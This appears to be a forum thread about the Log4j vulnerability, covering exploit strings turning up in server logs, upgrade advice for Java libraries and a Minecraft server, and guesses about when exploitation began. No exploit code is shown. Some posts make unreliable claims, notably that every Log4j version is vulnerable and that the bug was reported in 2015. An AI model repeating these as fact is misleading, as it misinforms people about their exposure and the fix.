No, not just in error messages. I still play with that Linode credit and NGINX and I see logs where the exploit string is set as user agent, and most web servers log that by default.
even game clients might log players who connect, and disconnect (or even try to connect). If any of them use the lookup… bam
doubtful.
changes name to exploit string
lets go boys.
I’m stopping with the FUD. I don’t know enough, and already typed way too much crap here that has detracted from people who might Actually know of actual apps affected.
thanks for the support guys.
The long and short of it is that if an exploitable string is logged, your application needs to be patched.
FYI Guys, if you use Oracle Database they are listing as not affected. However, there may be bundled internal tools which have the vulnerable version of the jar present, if you don’t care about these feel free to just delete them if they are not in use. Otherwise, use the patched version >=2.16.0.
Well guess this will be fun to watch the aftermath of this.
You’ll be watching for a while. The initial panic will pass, but this isn’t going to be “over” for quite some time.
Guarantee we will see some company owned because they didn’t patch this in like April.
actually mate you were pretty much on the ball.
anything that uses apache’s jog4j is vulnerable. and thats regardless of version.
apparently other versions even the latest have multiple attack vectors.
this one is just the easiest to POC, to get the info out, to show joe public its serious. and not just for business.
everything from home naz to your tv could be affected if it uses this as logging and because its apache/java, thats pretty much everything webfacing >.< oh its bad.
anyhoo john hammond gives some insight from an infosec perspective.
How would I go about patching? My Minecraft server is using an older version of log4j. It says 1.18.1 is fixed but every time I delete it from my system it comes back after a Minecraft server startup.
This is shaking out to be quite the story:
Bug introduced 4 years ago… not very easily discoverable by fuzzing, but discoverable nevertheless (I estimate it should take someone a week to find it): Java Fuzzer Reliably Finds log4j RCE
This is sad… but it happens.
However this article points out the timeline:
“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed,”
… but this is after it was reportedly discovered.
- Did someone with insight into 0-day sell the bug details?
- Did someone sit on the 0-day hoping to use it offensively until they noticed they weren’t the only ones?
- Fluke coincidence?
Something tells me we don’t have the full story.
Just upgrade to 1.18.1 and you’re good. Don’t bother deleting log4j, because the server needs it.
But you should also used the patched versions of Java, CLI args and the Minecraft server.
Layers my friend.
Given that the 2b2t crowd has discovered (and exploited) Minecraft vulnerabilities for months (maybe even years) before they became publicly known, I have no doubts that this has been actively been exploited by someone, somewhere, for some time, only just now getting discovered.
If you don’t know what to look for in your logs, it’s difficult to know if you’ve ever been exploited.
Doubtful, at least with regards to Minecraft players. It would have leaked, and the 2b servers would have been much more thoroughly owned if that were the case.
The 2b bug hunters tend to be more interested in Minecraft code, not libs, and their exploit methods are incredibly rudimentary. Minecraft is just not a high value target.
The bug was first reported back in 2015 but there was evidence that the bug was exploited in the wild for 9 days before it was publicly disclosed.
Once it went public the gates of Oblivion were opened.
I meant that it was likely in use somewhere before the earliest known exploit date, not necessarily 2b2t/Minecraft. Earliest known is rarely the actual first exploit, just the first that someone who knows how to read the logs found and felt like talking about it.
As @Dynamic_Gravity said, this isn’t new. There’s an old Blackhat video which talks about JNDI exploits.
Did not expect a sequel so soon…
Gives me PrintNightmare vibes…